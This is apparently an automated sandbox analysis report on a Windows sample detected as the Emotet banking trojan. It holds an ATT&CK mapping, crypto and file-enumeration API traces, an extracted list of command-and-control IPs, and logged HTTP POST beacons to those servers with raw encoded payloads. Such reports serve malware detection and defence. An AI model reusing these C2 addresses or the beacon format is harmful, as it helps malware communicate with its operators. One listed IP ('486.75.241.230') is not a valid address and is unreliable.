Loading ...

Play interactive tourEdit tour

Analysis Report n5hhkdky_exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:211723
Start date:28.02.2020
Start time:09:29:23
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 15m 32s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:n5hhkdky_exe (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@7/1@0/9
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 54.5% (good quality ratio 53.2%)
  • Quality average: 79.9%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 85
  • Number of non-executed functions: 397
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MusNotifyIcon.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Execution through API121Hidden Files and Directories1Valid Accounts1Disabling Security Tools1Input Capture1System Time Discovery2Remote File Copy3Input Capture1Data Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaCommand-Line Interface2Valid Accounts1Access Token Manipulation1Software Packing1Network SniffingSecurity Software Discovery21Remote ServicesClipboard Data2Exfiltration Over Other Network MediumCommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesService Execution12Modify Existing Service11Process Injection1Deobfuscate/Decode Files or Information1Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskNew Service2New Service2File Deletion1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol22SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery37Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading12Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskHidden Files and Directories1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionValid Accounts1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation1Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection1KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: n5hhkdky_exe.exeAvira: detection malicious, Label: TR/AD.Emotet.ebaw
Found malware configurationShow sources
Source: leelsensor.exe.3280.8.memstrMalware Configuration Extractor: Emotet {"C2 list": ["59.103.164.174/zeZ30sx6u6cxuuD", "59.110.18.236:443", "206.81.10.215:8080", "107.2.2.28/FpU6cre", "107.2.2.28/537", "486.75.241.230/8HPGE9Y", "486.75.241.230/8HPGE9bD", "190.12.119.180:443", "45.56.88.91:443", "47.50.251.130/HLHvQpxstemprof", "47.50.251.130/HLHvQpx", "186.75.241.230/8HPGE9", "186.75.241.230/8HPGE9bD", "51.68.220.244/THUbD", "51.68.220.244:8080", "88.91.88.91:443"]}
Multi AV Scanner detection for submitted fileShow sources
Source: n5hhkdky_exe.exeVirustotal: Detection: 78%Perma Link
Source: n5hhkdky_exe.exeMetadefender: Detection: 62%Perma Link
Source: n5hhkdky_exe.exeReversingLabs: Detection: 80%
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.0.n5hhkdky_exe.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ebaw
Source: 1.0.n5hhkdky_exe.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ebaw
Source: 8.0.leelsensor.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ebaw
Source: 5.0.leelsensor.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.ebaw

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_022B207B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_022B215A
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1F11 CryptExportKey,4_2_022B1F11
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext,4_2_022B1F75
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1F56 CryptGetHashParam,4_2_022B1F56
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_022B1FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_022B1FFC
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F9207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,8_2_00F9207B
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,8_2_00F91FFC
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,8_2_00F91F75
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91F11 CryptExportKey,8_2_00F91F11
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F9215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,8_2_00F9215A
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91F56 CryptGetHashParam,8_2_00F91F56

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,1_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 1_2_00448F3F lstrlenA,FindFirstFileA,FindClose,1_2_00448F3F
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00434A9B __EH_prolog3_GS,GetFullPathNameA,_DebugHeapAllocator,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_DebugHeapAllocator,4_2_00434A9B
Source: C:\Users\user\Desktop\n5hhkdky_exe.exeCode function: 4_2_00448F3F lstrlenA,FindFirstFileA,FindClose,4_2_00448F3F

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.5:49779 -> 190.12.119.180:443
Source: TrafficSnort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49781 -> 107.2.2.28:80
Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.5:49784 -> 45.56.88.91:443
Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.5:49787 -> 206.81.10.215:8080
Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.5:49789 -> 186.75.241.230:80
Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.5:49791 -> 59.103.164.174:80
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49786 -> 51.68.220.244:8080
Source: global trafficTCP traffic: 192.168.2.5:49787 -> 206.81.10.215:8080
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /dIcDsclHnHkYC8AHTsU HTTP/1.1Referer: http://45.56.88.91/dIcDsclHnHkYC8AHTsUContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.56.88.91:443Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 49 63 44 73 63 6c 48 6e 48 6b 59 43 38 41 48 54 73 55 3d 55 6a 4c 62 58 53 6e 68 70 30 50 51 67 39 70 32 31 32 49 65 69 68 36 63 4e 55 46 38 54 48 52 63 44 50 69 6a 63 69 59 73 53 6e 67 6d 41 44 65 77 52 53 64 68 66 52 46 38 36 71 4d 53 58 62 56 68 50 70 48 4a 61 6c 44 42 57 6d 6d 49 46 76 77 35 74 57 69 78 33 30 7a 75 6b 33 71 35 47 78 6e 4e 69 79 59 6b 77 7a 79 57 37 59 45 35 57 61 56 6e 65 4d 77 70 45 52 6a 39 55 4f 6f 49 50 72 6f 53 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: dIcDsclHnHkYC8AHTsU=UjLbXSnhp0PQg9p212Ieih6cNUF8THRcDPijciYsSngmADewRSdhfRF86qMSXbVhPpHJalDBWmmIFvw5tWix30zuk3q5GxnNiyYkwzyW7YE5WaVneMwpERj9UOoIProSd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /THUbD HTTP/1.1Referer: http://51.68.220.244/THUbDContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.68.220.244:8080Content-Length: 606Connection: Keep-AliveCache-Control: no-cacheData Raw: 54 48 55 62 44 3d 54 50 62 66 75 68 72 4c 25 32 42 43 47 45 55 61 73 71 49 4d 72 50 52 47 6e 6e 39 4a 6c 51 4b 6c 49 51 77 43 67 79 35 37 25 32 46 53 49 56 25 32 46 71 79 65 72 68 68 32 38 4c 4d 4c 6a 39 62 51 4f 42 6c 44 35 46 53 35 36 75 52 77 6c 54 61 4e 33 48 69 46 50 50 74 6e 58 4c 79 37 7a 25 32 46 7a 65 42 25 32 46 53 4a 78 4f 45 54 76 36 41 78 70 61 65 25 32 42 31 4f 41 32 67 4c 4d 5a 50 4c 42 42 79 72 69 57 6c 74 78 70 65 25 32 46 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: THUbD=TPbfuhrL%2BCGEUasqIMrPRGnn9JlQKlIQwCgy57%2FSIV%2Fqyerhh28LMLj9bQOBlD5FS56uRwlTaN3HiFPPtnXLy7z%2FzeB%2FSJxOETv6Axpae%2B1OA2gLMZPLBByriWltxpe%2Fd3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /bAvwkbq HTTP/1.1Referer: http://206.81.10.215/bAvwkbqContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 206.81.10.215:8080Content-Length: 598Connection: Keep-AliveCache-Control: no-cacheData Raw: 62 41 76 77 6b 62 71 3d 62 33 32 39 54 61 49 46 45 54 4d 64 4e 39 32 34 56 6a 49 78 7a 74 64 6b 46 79 64 63 66 52 25 32 46 61 4f 43 4c 31 35 7a 71 4a 34 51 4f 33 55 78 4a 4d 42 69 70 71 71 58 44 6a 79 61 55 66 65 68 6d 42 44 47 4f 53 33 76 41 64 4d 65 31 38 6b 56 42 67 74 58 6d 38 44 36 52 66 35 7a 58 7a 51 37 73 66 55 69 67 68 58 55 32 25 32 46 6a 44 49 39 37 66 57 65 39 6b 67 4d 6d 78 51 5a 34 62 67 7a 42 30 79 39 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: bAvwkbq=b329TaIFETMdN924VjIxztdkFydcfR%2FaOCL15zqJ4QO3UxJMBipqqXDjyaUfehmBDGOS3vAdMe18kVBgtXm8D6Rf5zXzQ7sfUighXU2%2FjDI97fWe9kgMmxQZ4bgzB0y9d3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Source: global trafficHTTP traffic detected: POST /zeZ30sx6u6cxuuDrRRH HTTP/1.1Referer: http://59.103.164.174/zeZ30sx6u6cxuuDrRRHContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.103.164.174Content-Length: 616Connection: Keep-AliveCache-Control: no-cacheData Raw: 7a 65 5a 33 30 73 78 36 75 36 63 78 75 75 44 72 52 52 48 3d 61 37 6e 52 65 4e 7a 62 6d 37 39 6d 72 62 64 64 66 49 35 33 39 72 6b 4d 25 32 46 74 6c 4e 25 32 46 4d 34 7a 65 49 74 77 59 34 59 58 4d 69 43 62 42 58 51 50 5a 52 42 37 65 33 43 75 48 66 5a 37 66 4e 68 61 57 76 75 4e 25 32 42 43 55 71 6a 4a 46 63 43 6e 71 66 33 50 36 71 71 31 44 68 62 55 78 4a 70 36 70 51 4c 37 67 59 6b 50 6e 51 59 50 66 77 31 4c 55 70 25 32 42 4f 58 54 57 78 25 32 42 6a 35 33 46 31 61 63 42 37 64 33 74 76 6d 31 42 33 75 46 4f 25 32 42 73 49 67 42 4d 6e 25 32 46 70 75 4e 72 51 25 32 46 30 41 5a 61 79 6c 6b 62 37 63 4c 62 64 75 51 71 4a 6b 65 53 43 42 79 46 6a 54 4e 72 35 42 4c 6d 74 4a 58 47 4c 49 46 35 38 73 71 6a 63 59 6d 46 42 36 6d 54 76 45 52 55 57 50 48 75 25 32 42 51 34 34 47 4f 45 42 6d 63 70 5a 39 32 57 77 4c 71 70 57 74 77 4e 72 7a 43 75 76 55 74 53 37 52 59 76 4c 6d 35 58 56 37 45 25 32 42 35 4c 36 53 73 4c 37 43 78 71 69 59 6b 69 4d 33 41 68 50 46 65 4e 25 32 42 79 57 65 6b 65 69 47 73 55 4f 66 73 59 56 61 6c 72 36 43 4d 31 52 4b 6a 53 6b 48 48 75 4f 31 71 41 48 37 43 78 42 74 32 65 77 58 25 32 46 46 35 39 41 73 25 32 42 75 36 6b 6a 47 6b 69 69 56 69 47 30 78 72 4e 61 32 70 48 39 64 7a 55 59 74 6e 32 59 53 53 62 47 34 4a 34 32 39 4e 4d 34 36 50 49 67 31 54 31 71 43 52 30 51 71 39 35 39 79 44 33 43 32 65 63 44 6b 79 50 39 4e 38 25 32 42 4e 46 50 79 50 44 6e 67 4d 76 49 58 71 79 6b 48 4b 59 54 6a 49 42 45 38 4d 72 6a 4a 74 71 45 25 32 46 77 35 63 55 31 77 70 4c 30 30 31 65 70 45 25 32 42 65 70 56 30 70 39 6d 48 38 47 73 53 67 57 73 69 37 39 38 6c 4b 75 30 73 25 32 42 75 66 34 69 71 6b 77 35 77 66 34 7a 77 41 73 58 6d 75 6f 66 4f 66 75 48 4f 4f 25 32 42 52 49 53 62 41 5a 6d 6e 63 78 36 47 53 34 52 38 58 49 31 4e 4f 63 6e 4b 55 6e 6a 68 52 37 55 42 6c 4a 7a 52 52 75 71 4e 69 47 37 37 6e 49 34 61 31 59 66 67 50 58 32 50 44 4d 47 45 77 Data Ascii: zeZ30sx6u6cxuuDrRRH=a7nReNzbm79mrbddfI539rkM%2FtlN%2FM4zeItwY4YXMiCbBXQPZRB7e3CuHfZ7fNhaWvuN%2BCUqjJFcCnqf3P6qq1DhbUxJp6pQL7gYkPnQYPfw1LUp%2BOXTWx%2Bj53F1acB7d3tvm1B3uFO%2BsIgBMn%2FpuNrQ%2F0AZaylkb7cLbduQqJkeSCByFjTNr5BLmtJXGLIF58sqjcYmFB6mTvERUWPHu%2BQ44GOEBmcpZ92WwLqpWtwNrzCuvUtS7RYvLm5XV7E%2B5L6SsL7CxqiYkiM3AhPFeN%2ByWekeiGsUOfsYValr6CM1RKjSkHHuO1qAH7CxBt2ewX%2FF59As%2Bu6kjGkiiViG0xrNa2pH9dzUYtn2YSSbG4J429NM46PIg1T1qCR0Qq959yD3C2ecDkyP9N8%2BNFPyPDngMvIXqykHKYTjIBE8MrjJtqE%2Fw5cU1wpL001epE%2BepV0p9mH8GsSgWsi798lKu0s%2Buf4iqkw5wf4zwAsXmuofOfuHOO%2BRISbAZmncx6GS4R8XI1NOcnKUnjhR7UBlJzRRuqNiG77nI4a1YfgPX2PDMGEw
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknownTCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknownTCP traffic detected without corresponding DNS query: 190.12.119.180
Source: unknownTCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknownTCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknownTCP traffic detected without corresponding DNS query: 47.50.251.130
Source: unknownTCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknownTCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknownTCP traffic detected without corresponding DNS query: 107.2.2.28
Source: unknownTCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknownTCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknownTCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknownTCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknownTCP traffic detected without corresponding DNS query: 45.56.88.91
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknownTCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknownTCP traffic detected without corresponding DNS query: 186.75.241.230
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Source: unknownTCP traffic detected without corresponding DNS query: 59.103.164.174
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\leelsensor.exeCode function: 8_2_00F91383 InternetReadFile,8_2_00F91383
Posts data to webserverShow sources
